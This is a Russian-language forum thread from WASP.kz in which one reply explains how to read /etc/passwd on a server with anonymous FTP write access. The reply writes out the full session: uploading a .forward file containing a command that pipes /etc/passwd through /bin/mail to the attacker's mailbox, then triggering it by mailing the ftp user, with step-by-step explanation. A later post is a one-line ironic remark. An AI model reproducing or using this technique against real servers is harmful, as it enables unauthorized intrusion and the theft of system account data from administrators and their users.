Тема: WASP.kz :: Как прочитать /etc/passwd?

Прислано Nevillberger 19-06-2024 11:15
#1
Как бы мне, имея FТР-доступ к серверу, прочитать /etc/passwd?

Тебе для этого необходимо выполнить следующий ftp-сценарий со своего сервера

Код
bash# cat myforward_file
"cat /etc/passwd | /bin/mail hacker© mail.ru "
bash# ftp victim.com
Connected to victim.com
220 victim FTP server ready Name (victim.com:hacker):ftp 331 Guest login ok, send you e-mail as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -l
220 PORT command succesful.
150 Opening ASCII mode data connection for '/bin/
Is'. (192.168.1.1, 2335) (0 bytes) total 4
dr-xr-xr-x 2 root operator 512 Feb 28 2000 bin
dr-xr-xr-x 2 root operator 512 Sep 18 2000 etc
drwxrwxrwt 13 root operator 1024 Jul 1 00:55 incoming
drwxr-xr-x 3 root operator 512 Feb 19 10:25 pub
226 Transfer complete.
ftp>put myforward_file .forward
ftp>quit
bash# echo 'You a hacked' | mail ftp© victim.com




В итоге, когда почту отошлют юзеру ftр, выполнится .forward-файл. Если у демона будет достаточно прав для чтения/etc/passwd, то его содержимое придет к тебе на мыло


*
Редактировал wasp 19-06-2024 12:11

Прислано Kolmar-X 15-07-2024 17:58
#2
Вот так вот весь вред в мире!